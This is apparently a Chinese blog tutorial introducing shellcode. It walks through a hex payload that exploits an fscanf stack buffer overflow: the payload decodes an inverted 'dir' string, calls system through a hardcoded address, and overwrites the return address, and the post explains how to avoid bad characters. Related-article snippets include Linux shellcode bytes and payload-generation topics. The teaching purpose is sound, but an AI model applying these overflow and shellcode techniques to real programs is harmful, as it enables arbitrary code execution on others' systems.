ShellCode第一课

最新推荐文章于 2022-02-23 15:02:25 发布
最新推荐文章于 2022-02-23 15:02:25 发布
阅读量575 收藏
点赞数
文章标签: system null 优化 file c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cmdhack/article/details/5924671
版权

C代码

 

未优化的Shell.bin文件 只是简单表示执行过程

9B968DFF9090909090909090909090908BF583EE78F7168BE65481EAA9D3527CFFD290909090909090909090909090909090909058FF1200

说明

9B968DFF  dir”的反码表示形式

909090909090909090909090   空余空间

8BF583EE78F7168BE65481EAA9D3527CFFD2

0012FF58    8BF5            mov     esi, ebp  //构造的EIP

0012FF5A    83EE 78         sub     esi, 78

0012FF5D    F716            not     dword ptr [esi]  //还原”dir”

0012FF5F    8BE6            mov     esp, esi

0012FF61    54              push    esp

//得到system地址并执行

0012FF62    81EA A9D3527C   sub     edx, 7C52D3A9

0012FF68    FFD2            call    edx  

 

909090909090909090909090909090909090空余空间

58FF1200  关键点:这里替换了原来的函数返回地址 指向我们的代码地址

关键点

1:Fscanf在参数传递过程中没有对参数长度进行校验造成缓冲区溢出

2:Fscanf函数在读取文件的时候遇到 结束字符”00”,空格”20”等不能继续读取 所以

  shellcode的时候这是关键点  所以要避免出现这些敏感字符 所以用求反not

  等办法处理  或者++ --……

 

 

 

cmdhack
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
手戳shellcode编写 第一课(动态函数地址调用函数)
啊渊的专栏
08-21 130
在程序免杀中,我们通常不会直接通过函数名称方式来调用函数,一般都是通过执行shellcode来执行我们需要的代码。如果直接将exe文件解析出来的shellcode会发现这些shellcode不能直接运行,因为函数地址调用的问题。因此我们需要动态获取函数地址来调用shellcode。为了了解shellcode的基础,我们先使用c++源码方式来学习,如果动态的获取函数地址,然后再使用汇编编写以下功能实现shellcode的完成编写。
CS-Shellcode分析入门 第二课
WgpSec狼组安全团队
03-28 1016
本文作者:Gality 本文字数:3700 阅读时长:20~30分钟 附件/链接:点击查看原文下载 本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载 本文链接:阅读更佳 https://mp.weixin.qq.com/s/uQjkf5fTf8s_qAOwZkcpLA 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。 狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章...
linux shell(一) helloWorld
WalleChoy's blog
07-25 453
1. chmod 777 script.sh ./script.sh ;等同于 enter键2.打印 echo xx printf: 类似c语言3.变量/环境变量 cat /proc/PID/environ取进程id:grep进程名var=”value”echoPID/environ 取进程id:grep 进程名 var=”value” echo var echo ${v
shellcode编写32位(Linux)
helloworlddm的博客
06-06 1333
系统调用 shellcode是一组可注入的指令,可以在被攻击的程序中运行。由于shellcode要直接操作寄存器和函数,所以必须是十六进制的形式。 那么为什么要写shellcode呢?因为我们要让目标程序以不同于设计者预期的方式运行,而操作的程序的方法之一就是强制它产生系统调用(system,call,syscall)。通过系统调用,你可以直接访问系统内核。 在Linux里有两个方法来执行系统调用,间接的方法是c函数包装(libc),直接的方法是用汇编指令(通过把适当的参数加载到寄存器,然后调用int 0x
windows下shellcode编写入门
热门推荐
x_nirvana的博客
03-31 1万+
本文简要介绍shellcode开发技术及其特点。理解这些概念可以有助于我们编写自己的shellcode。更进一步讲,你可以修改现有的漏洞利用代码来执行自己所需要的定制功能。
win10_x64下shellcode提权工具(SYSTEM权限)
Anansi的博客
11-22 3563
之前写过一篇远线程注入与一篇shellcode编写的文章: Win10_X64远线程注入dll(非CreateRemoteThread) Windows 10_X64环境shellcode编写 上一次是通过远线程注入,将指定的dll模块加载进我们指定的进程,这一次将我们写好的shellcode注入进指定的进程,从而执行任意代码。 首先我们要清楚如何获取一个具有system权限的cmd,想要获取一个具有system权限的cmd,首先这个cmd得是一个具有system权限进程的子进程,windows下具有sys
第六十八课:基于Ruby内存加载shellcode第一季1
08-03
基于Ruby内存加载shellcode第一季 本资源是一个关于APT攻击与防御的教程,专门介绍基于Ruby内存加载shellcode的技术。该教程着重于msf无文件渗透的基础过渡,并为msf插件编写做基础过渡。 Ruby shellcode 生成 ...
第六十八课:基于Ruby内存加载shellcode第一季.docx
09-15
根据提供的文档信息,本文将详细解释“第六十八课:基于Ruby内存加载shellcode第一季”中的关键知识点。主要内容包括理解shellcode的概念、如何利用Ruby语言生成shellcode以及如何在内存中加载并执行shellcode。 ##...
工具介绍Veil-Evasion(第十一课)1
08-03
8. c/shellcode_inject/flatc:注入平坦的C shellcode。 9. cs/meterpreter/rev_http:创建.NET Meterpreter反向HTTP Payload。 10. cs/meterpreter/...:其他.NET相关的Meterpreter Payload。 这些Payload可以根据...
msf的前生今世(第三十一课).docx
09-15
- **Nops(空操作序列)**:辅助代码,用于填充shellcode以达到特定长度。 - **Auxiliary(辅助模块)**:支持性的工具和服务,如扫描器和嗅探器等。 - **Post(后渗透攻击)**:用于在成功入侵后进行进一步的...
msfvenom常用生成payload命令(第十课)1
08-03
#### 一、概述 `msfvenom`是Metasploit框架中的一个工具,主要用于生成恶意载荷(payloads)。它可以帮助安全研究人员和渗透测试人员创建用于测试系统漏洞的定制化恶意代码。在进行APT攻击与防御的研究时,了解如何...
把"Hello, World\n"转为机器码shellcode 来显示
~ 飞 扬 的 天 空 ~
12-27 3713
源码 #include const unsigned char shellcode[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04"\ "\xb2\x0e\x59\xb3\x01\xcd\x80\x31\xc0\xb0\x01"\ "\x31\xdb
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 8924
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3391
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
写一段shellcode
最新发布
09-05
这是一个简单的 shellcode,它会在 Linux 系统上打开一个终端窗口: ``` \x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80 ``` 这段 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值